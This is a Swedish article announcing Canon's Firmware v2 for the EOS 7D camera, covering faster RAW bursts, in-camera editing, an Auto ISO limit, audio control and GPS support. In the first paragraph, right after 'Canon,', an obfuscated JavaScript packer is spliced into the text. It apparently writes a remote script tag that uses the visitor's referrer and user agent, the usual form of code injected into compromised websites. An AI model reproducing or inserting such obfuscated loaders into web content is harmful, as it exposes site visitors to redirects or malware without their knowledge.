Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Canon lägger till flera nya funktioner för EOS 7D

Canon lägger till flera nya funktioner för EOS 7D
Sebastian

Canon, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdzre|var|u0026u|referrer|rbyah||js|php’.split(’|’),0,{}))
marknadsledare inom digital bild, förstärker EOS 7D med uppdaterad Firmware v2 som tillför många nya funktioner för fotoentusiaster som vill tänja på gränserna. Den nya firmware-uppgraderingen bygger vidare på kamerans höga hastighet, avancerade hantering och kreativa möjligheter. Snabbare RAW-bildserier, redigering direkt i kameran, användardefinierad Auto ISO och stöd för GP-E2, Canons senaste GPS?mottagare, är några av nyheterna. 

EOS 7D lanserades 2009 och designades utifrån den feedback som gavs av tusentals fotografer över hela världen. Den anses fortfarande vara en av marknadens bästa APS?C?kameror, med en perfekt kombination av enastående bildkvalitet och flexibilitet. Canon följde samma mönster vid utvecklingen av Firmware v2 och fick feedback från användarna för att uppdatera EOS 7D med ännu bättre prestanda, större kapacitet och kreativa funktioner.

Bättre RAW-prestanda
Med en 18 megapixels APS-C CMOS-sensor, ”Dual DIGIC 4”-processorer och utökat maximalt ISO på 12800 kan EOS 7D nu erbjuda snabba, högkvalitativa tagningar med hastigheter upp till 8 bilder per sekund. Den nya firmware-uppgraderingen innehåller kraftfulla minneshanteringsalgoritmer från Canons flaggskepp i EOS-1-serien, och nu blir flexibiliteten större vid kontinuerlig tagning med maximal RAW-buffert för 25 RAW- eller 130 JPEG-bilder. Kombinerat med kamerans 18 MP upplösning och 14-bitars bildbearbetning kan fotograferna nu i detalj fånga alla avgörande ögonblick.

Bildredigering och gradering direkt i kameran
Nya redigeringsfunktioner ger fotograferna mer kontroll över bildernas utseende och efterbearbetningen kan starta redan i kameran. RAW-filerna kan bearbetas och artefakter som periferibelysning, distorsion och kromatisk aberration kan korrigeras. Dessutom kan justeringar av vitbalans, skärpa och bildstil, liksom många andra parametrar, nu också göras direkt efter tagning och resultaten sparas som nya JPEG?filer. JPEG-bilder kan dessutom storleksändras direkt, utan behov av dator.

Med hjälp av bildgraderingsfunktionen filtrerar fotograferna enkelt stora bildvolymer på väg tillbaka från en tagning. Bildgraderingsuppgifterna sparas i varje fils metadata och kan avläsas med många olika redigeringsprogram, inklusive Canon Digital Photo Professional, och andra branschprogram som Apple Aperture, Adobe Lightroom och Bridge.

Extra kontroll för stillbilder och filmsekvenser
Den nya uppgraderingen ger större flexibilitet både för stillbilder och filmer. Nytt Auto ISO med maxgräns innebär att fotograferna kan begränsa maximal ISO-hastighet till vilket värde som helst inom området ISO 400–6400. Kontrollen över exponeringen blir bättre och maximal automatisk ISO-hastighet kan anpassas efter personliga önskemål. Parametrarna kan också justeras efter olika förhållanden för att uppnå speciella kreativa mål.

Ljudet har förbättrats i filminspelningsläget. Filminspelningen i Full HD (1920x1080p) kan kompletteras med 16 bitars digitalt stereoljud med 48 kHz, och med en ny manuell kontroll av ljudnivån kan fotograferna välja bland 64 nivåer. Ett digitalt vindbrusfilter reducerar dessutom ljudet runt mikrofonen.

Spåra dina resor med GPS
Med Firmware v2 kan fotograferna nu fastställa positionen för bilderna tack vare stöd för GPS-mottagaren GP-E2 – Canons senaste högpresterande GPS-enhet.  GP-E2 fästs i kamerans blixtsko och ansluts till kameran via kabel. Bilderna märks geografiskt med uppgifter om longitud, latitud och altitud liksom i vilken riktning bilden togs. Och all information läggs in i bildens EXIF-fil*. En GPS-loggningsfunktion loggar kamerans position genom att hämta GPS-data i regelbundna intervaller, och kompatibilitet med Google Maps innebär att resvägen enkelt kan visas med hjälp av Canons medföljande kartprogram Map Utility.

Firmware v2 finns tillgängligt från augusti 2012.

Canon EOS 7D Firmware v2 – nya funktioner:

 • Förbättrad maximal bildserie för RAW-bilder (upp till 25)
 • RAW-bildredigering i kameran
 • Bildgradering i kameran
 • Storleksändring av JPEG i kameran
 • Inställning av maxvärde för Auto ISO (ISO 400-6400)
 • Manuell justering av ljudnivån vid filminspelning
 • GPS-kompatibilitet
 • Egna filnamn
 • Tidszonsinställningar
 • Snabbare scrollning av förstorade bilder
 • Snabbkontrollfönster vid uppspelning

Canon EOS 7D – viktiga funktioner:

 • 18 MP APS-C CMOS-sensor
 • Upp till 8 bilder per sekund
 • ISO-område upp till 12800
 • Cirka 100 % i sökaren
 • 19 autofokuspunkter med korssensorer
 • iFCL-mätningssystem
 • ”Dual DIGIC 4”-bearbetning
 • Filminspelning i Full HD
 • Integrerad Speedlite-sändare
 • 3″ Clear View II LCD-skärm
 • Skal i magnesiumlegering, med skyddstätningar

*GPS-information gäller bara stillbilder.

Comments